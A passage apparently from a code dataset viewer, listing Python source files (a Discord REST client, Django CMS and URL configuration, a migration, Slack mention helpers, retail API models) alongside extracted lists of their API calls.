'_viso2.TrackVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (55567, 55580), False, 'import _viso2\n'), ((55671, 55714), '_viso2.TrackVector___delslice__', '_viso2.TrackVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (55702, 55714), False, 'import _viso2\n'), ((55852, 55895), '_viso2.TrackVector___delitem__', '_viso2.TrackVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (55882, 55895), False, 'import _viso2\n'), ((56057, 56100), '_viso2.TrackVector___getitem__', '_viso2.TrackVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (56087, 56100), False, 'import _viso2\n'), ((56277, 56320), '_viso2.TrackVector___setitem__', '_viso2.TrackVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (56307, 56320), False, 'import _viso2\n'), ((56390, 56418), '_viso2.TrackVector_pop', '_viso2.TrackVector_pop', (['self'], {}), '(self)\n', (56412, 56418), False, 'import _viso2\n'), ((56491, 56525), '_viso2.TrackVector_append', '_viso2.TrackVector_append', (['self', 'x'], {}), '(self, x)\n', (56516, 56525), False, 'import _viso2\n'), ((56598, 56628), '_viso2.TrackVector_empty', '_viso2.TrackVector_empty', (['self'], {}), '(self)\n', (56622, 56628), False, 'import _viso2\n'), ((56742, 56771), '_viso2.TrackVector_size', '_viso2.TrackVector_size', (['self'], {}), '(self)\n', (56765, 56771), False, 'import _viso2\n'), ((56840, 56872), '_viso2.TrackVector_swap', '_viso2.TrackVector_swap', (['self', 'v'], {}), '(self, v)\n', (56863, 56872), False, 'import _viso2\n'), ((56987, 57017), '_viso2.TrackVector_begin', '_viso2.TrackVector_begin', (['self'], {}), '(self)\n', (57011, 57017), False, 'import _viso2\n'), ((57128, 57156), '_viso2.TrackVector_end', '_viso2.TrackVector_end', (['self'], {}), '(self)\n', (57150, 57156), False, 'import _viso2\n'), ((57281, 57312), '_viso2.TrackVector_rbegin', '_viso2.TrackVector_rbegin', (['self'], {}), '(self)\n', (57306, 57312), False, 'import _viso2\n'), ((57433, 57462), '_viso2.TrackVector_rend', '_viso2.TrackVector_rend', (['self'], {}), '(self)\n', (57456, 57462), False, 'import _viso2\n'), ((57527, 57557), '_viso2.TrackVector_clear', '_viso2.TrackVector_clear', (['self'], {}), '(self)\n', (57551, 57557), False, 'import _viso2\n'), ((57694, 57732), '_viso2.TrackVector_get_allocator', '_viso2.TrackVector_get_allocator', (['self'], {}), '(self)\n', (57726, 57732), False, 'import _viso2\n'), ((57803, 57836), '_viso2.TrackVector_pop_back', '_viso2.TrackVector_pop_back', (['self'], {}), '(self)\n', (57830, 57836), False, 'import _viso2\n'), ((58064, 58101), '_viso2.TrackVector_erase', '_viso2.TrackVector_erase', (['self', '*args'], {}), '(self, *args)\n', (58088, 58101), False, 'import _viso2\n'), ((58351, 58380), '_viso2.new_TrackVector', '_viso2.new_TrackVector', (['*args'], {}), '(*args)\n', (58373, 58380), False, 'import _viso2\n'), ((58573, 58610), '_viso2.TrackVector_push_back', '_viso2.TrackVector_push_back', (['self', 'x'], {}), '(self, x)\n', (58601, 58610), False, 'import _viso2\n'), ((58684, 58714), '_viso2.TrackVector_front', '_viso2.TrackVector_front', (['self'], {}), '(self)\n', (58708, 58714), False, 'import _viso2\n'), ((58786, 58815), '_viso2.TrackVector_back', '_viso2.TrackVector_back', (['self'], {}), '(self)\n', (58809, 58815), False, 'import _viso2\n'), ((58894, 58931), '_viso2.TrackVector_assign', '_viso2.TrackVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (58919, 58931), False, 'import _viso2\n'), ((59067, 59105), '_viso2.TrackVector_resize', '_viso2.TrackVector_resize', (['self', '*args'], {}), '(self, *args)\n', (59092, 59105), False, 'import _viso2\n'), ((59287, 59325), '_viso2.TrackVector_insert', '_viso2.TrackVector_insert', (['self', '*args'], {}), '(self, *args)\n', (59312, 59325), False, 'import _viso2\n'), ((59400, 59435), '_viso2.TrackVector_reserve', '_viso2.TrackVector_reserve', (['self', 'n'], {}), '(self, n)\n', (59426, 59435), False, 'import _viso2\n'), ((59557, 59590), '_viso2.TrackVector_capacity', '_viso2.TrackVector_capacity', (['self'], {}), '(self)\n', (59584, 59590), False, 'import _viso2\n'), ((488, 518), 'importlib.import_module', 'importlib.import_module', (['mname'], {}), '(mname)\n', (511, 518), False, 'import importlib\n'), ((566, 599), 'importlib.import_module', 'importlib.import_module', (['"""_viso2"""'], {}), "('_viso2')\n", (589, 599), False, 'import importlib\n'), ((1021, 1073), 'imp.load_module', 'imp.load_module', (['"""_viso2"""', 'fp', 'pathname', 'description'], {}), "('_viso2', fp, pathname, description)\n", (1036, 1073), False, 'import imp\n'), ((889, 906), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (896, 906), False, 'from os.path import dirname\n')] |
# -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
| [
"logging.getLogger",
"aiohttp.ClientSession",
"json.loads",
"json.dumps",
"datetime.datetime.now",
"asyncio.get_event_loop"
]
| [((354, 381), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (371, 381), False, 'import logging\n'), ((4193, 4250), 'json.dumps', 'json.dumps', (['obj'], {'separators': "(',', ':')", 'ensure_ascii': '(True)'}), "(obj, separators=(',', ':'), ensure_ascii=True)\n", (4203, 4250), False, 'import json\n'), ((891, 915), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (913, 915), False, 'import asyncio\n'), ((1553, 1568), 'aiohttp.ClientSession', 'ClientSession', ([], {}), '()\n', (1566, 1568), False, 'from aiohttp import ClientSession\n'), ((3917, 3943), 'datetime.datetime.now', 'datetime.datetime.now', (['utc'], {}), '(utc)\n', (3938, 3943), False, 'import datetime\n'), ((3599, 3615), 'json.loads', 'json.loads', (['text'], {}), '(text)\n', (3609, 3615), False, 'import json\n')] |
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import gettext as _
class CategoriesAppHook(CMSApp):
name = _("Categories")
def get_urls(self, page=None, language=None, **kwargs):
return ["apps.articles.urls"]
apphook_pool.register(CategoriesAppHook)
| [
"cms.apphook_pool.apphook_pool.register",
"django.utils.translation.gettext"
]
| [((287, 327), 'cms.apphook_pool.apphook_pool.register', 'apphook_pool.register', (['CategoriesAppHook'], {}), '(CategoriesAppHook)\n', (308, 327), False, 'from cms.apphook_pool import apphook_pool\n'), ((170, 185), 'django.utils.translation.gettext', '_', (['"""Categories"""'], {}), "('Categories')\n", (171, 185), True, 'from django.utils.translation import gettext as _\n')] |
# Generated by Django 3.1 on 2020-08-22 17:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BoardGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('eidtion_year', models.IntegerField()),
('designer', models.CharField(max_length=30)),
('game_duration_min', models.IntegerField()),
('player_number', models.IntegerField()),
('rating', models.IntegerField(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')])),
('played', models.BooleanField()),
('acquisition_date', models.DateField()),
],
),
]
| [
"django.db.models.DateField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.CharField"
]
| [((303, 396), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (319, 396), False, 'from django.db import migrations, models\n'), ((421, 452), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (437, 452), False, 'from django.db import migrations, models\n'), ((488, 509), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (507, 509), False, 'from django.db import migrations, models\n'), ((541, 572), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (557, 572), False, 'from django.db import migrations, models\n'), ((613, 634), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (632, 634), False, 'from django.db import migrations, models\n'), ((671, 692), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (690, 692), False, 'from django.db import migrations, models\n'), ((722, 832), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')]"}), "(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (\n 4, 'Good'), (5, 'Very good')])\n", (741, 832), False, 'from django.db import migrations, models\n'), ((857, 878), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (876, 878), False, 'from django.db import migrations, models\n'), ((918, 936), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (934, 936), False, 'from django.db import migrations, models\n')] |
import re
# regex for a user or channel mention at the beginning of a message
# example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>"
# interactive playground: https://regex101.com/r/2Z7eun/2
MENTION_PATTERN = r"(?:^\s?<@(.*?)>\s?)|(?:^\s?<#(.*?)\|.*?>\s?)"
def get_set_element(_set):
"""get the element from the set to which the iterator points; returns an
arbitrary item
"""
for element in _set:
return element
def get_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the passed user ID
"""
if match.person_1.user_id == user_id:
return match.person_1
elif match.person_2.user_id == user_id:
return match.person_2
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def get_other_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the user who is NOT
the passed user ID (i.e. the other Person)
"""
if match.person_1.user_id == user_id:
return match.person_2
elif match.person_2.user_id == user_id:
return match.person_1
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def blockquote(message):
"""return `message` with markdown blockquote formatting (start each line
with "> ")
"""
if message:
return re.sub(r"^", "> ", message, flags=re.MULTILINE)
else:
return None
def get_mention(message):
"""get the user or channel ID mentioned at the beginning of a message, if
any
"""
match = re.search(MENTION_PATTERN, message)
if match:
# return the first not-None value in the match group tuple, be it a
# user or channel mention
# https://stackoverflow.com/a/18533669
return next(group for group in match.group(1, 2) if group is not None)
else:
return None
def remove_mention(message):
"""remove the user or channel mention from the beginning of a message, if
any
"""
return re.sub(MENTION_PATTERN, "", message, count=1)
| [
"re.sub",
"re.search"
]
| [((1683, 1718), 're.search', 're.search', (['MENTION_PATTERN', 'message'], {}), '(MENTION_PATTERN, message)\n', (1692, 1718), False, 'import re\n'), ((2135, 2180), 're.sub', 're.sub', (['MENTION_PATTERN', '""""""', 'message'], {'count': '(1)'}), "(MENTION_PATTERN, '', message, count=1)\n", (2141, 2180), False, 'import re\n'), ((1471, 1517), 're.sub', 're.sub', (['"""^"""', '"""> """', 'message'], {'flags': 're.MULTILINE'}), "('^', '> ', message, flags=re.MULTILINE)\n", (1477, 1517), False, 'import re\n')] |
from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| [
"django.contrib.auth.views.LoginView.as_view",
"django.urls.path"
]
| [((125, 192), 'django.urls.path', 'path', (['"""studentclick"""', 'views.studentclick_view'], {'name': '"""student-click"""'}), "('studentclick', views.studentclick_view, name='student-click')\n", (129, 192), False, 'from django.urls import path\n'), ((316, 386), 'django.urls.path', 'path', (['"""studentsignup"""', 'views.student_signup_view'], {'name': '"""studentsignup"""'}), "('studentsignup', views.student_signup_view, name='studentsignup')\n", (320, 386), False, 'from django.urls import path\n'), ((392, 478), 'django.urls.path', 'path', (['"""student-dashboard"""', 'views.student_dashboard_view'], {'name': '"""student-dashboard"""'}), "('student-dashboard', views.student_dashboard_view, name=\n 'student-dashboard')\n", (396, 478), False, 'from django.urls import path\n'), ((488, 557), 'django.urls.path', 'path', (['"""student-check"""', 'views.student_check_view'], {'name': '"""student-check"""'}), "('student-check', views.student_check_view, name='student-check')\n", (492, 557), False, 'from django.urls import path\n'), ((563, 629), 'django.urls.path', 'path', (['"""student-exam"""', 'views.student_exam_view'], {'name': '"""student-exam"""'}), "('student-exam', views.student_exam_view, name='student-exam')\n", (567, 629), False, 'from django.urls import path\n'), ((635, 701), 'django.urls.path', 'path', (['"""take-exam/<int:pk>"""', 'views.take_exam_view'], {'name': '"""take-exam"""'}), "('take-exam/<int:pk>', views.take_exam_view, name='take-exam')\n", (639, 701), False, 'from django.urls import path\n'), ((707, 776), 'django.urls.path', 'path', (['"""start-exam/<int:pk>"""', 'views.start_exam_view'], {'name': '"""start-exam"""'}), "('start-exam/<int:pk>', views.start_exam_view, name='start-exam')\n", (711, 776), False, 'from django.urls import path\n'), ((782, 857), 'django.urls.path', 'path', (['"""calculate-marks"""', 'views.calculate_marks_view'], {'name': '"""calculate-marks"""'}), "('calculate-marks', views.calculate_marks_view, name='calculate-marks')\n", (786, 857), False, 'from django.urls import path\n'), ((863, 926), 'django.urls.path', 'path', (['"""view-result"""', 'views.view_result_view'], {'name': '"""view-result"""'}), "('view-result', views.view_result_view, name='view-result')\n", (867, 926), False, 'from django.urls import path\n'), ((932, 1004), 'django.urls.path', 'path', (['"""check-marks/<int:pk>"""', 'views.check_marks_view'], {'name': '"""check-marks"""'}), "('check-marks/<int:pk>', views.check_marks_view, name='check-marks')\n", (936, 1004), False, 'from django.urls import path\n'), ((1010, 1079), 'django.urls.path', 'path', (['"""student-marks"""', 'views.student_marks_view'], {'name': '"""student-marks"""'}), "('student-marks', views.student_marks_view, name='student-marks')\n", (1014, 1079), False, 'from django.urls import path\n'), ((1085, 1147), 'django.urls.path', 'path', (['"""expel/<int:pk>"""', 'views.student_expel_view'], {'name': '"""expel"""'}), "('expel/<int:pk>', views.student_expel_view, name='expel')\n", (1089, 1147), False, 'from django.urls import path\n'), ((1153, 1208), 'django.urls.path', 'path', (['"""video_feed"""', 'views.video_feed'], {'name': '"""video-feed"""'}), "('video_feed', views.video_feed, name='video-feed')\n", (1157, 1208), False, 'from django.urls import path\n'), ((1214, 1269), 'django.urls.path', 'path', (['"""train_feed"""', 'views.train_feed'], {'name': '"""train-feed"""'}), "('train_feed', views.train_feed, name='train-feed')\n", (1218, 1269), False, 'from django.urls import path\n'), ((1275, 1330), 'django.urls.path', 'path', (['"""check_feed"""', 'views.check_feed'], {'name': '"""check-feed"""'}), "('check_feed', views.check_feed, name='check-feed')\n", (1279, 1330), False, 'from django.urls import path\n'), ((1336, 1400), 'django.urls.path', 'path', (['"""logout"""', 'views.student_logout_view'], {'name': '"""student-logout"""'}), "('logout', views.student_logout_view, name='student-logout')\n", (1340, 1400), False, 'from django.urls import path\n'), ((219, 279), 'django.contrib.auth.views.LoginView.as_view', 'LoginView.as_view', ([], {'template_name': '"""student/studentlogin.html"""'}), "(template_name='student/studentlogin.html')\n", (236, 279), False, 'from django.contrib.auth.views import LoginView\n')] |
import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
客層セクションの更新を行います。
put処理のため、saveメソッドをオーバーライド
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| [
"smaregipy.utils.DictUtil.convert_key_to_snake",
"pydantic.Field"
]
| [((499, 528), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (504, 528), False, 'from pydantic import Field\n'), ((576, 605), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (581, 605), False, 'from pydantic import Field\n'), ((633, 662), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (638, 662), False, 'from pydantic import Field\n'), ((698, 727), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (703, 727), False, 'from pydantic import Field\n'), ((766, 795), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (771, 795), False, 'from pydantic import Field\n'), ((845, 874), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (850, 874), False, 'from pydantic import Field\n'), ((925, 954), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (930, 954), False, 'from pydantic import Field\n'), ((1422, 1451), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1427, 1451), False, 'from pydantic import Field\n'), ((1502, 1531), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1507, 1531), False, 'from pydantic import Field\n'), ((1581, 1610), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1586, 1610), False, 'from pydantic import Field\n'), ((1661, 1690), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1666, 1690), False, 'from pydantic import Field\n'), ((2048, 2111), 'smaregipy.utils.DictUtil.convert_key_to_snake', 'DictUtil.convert_key_to_snake', (['response[self.Response.KEY_DATA]'], {}), '(response[self.Response.KEY_DATA])\n', (2077, 2111), False, 'from smaregipy.utils import NoData, DictUtil\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.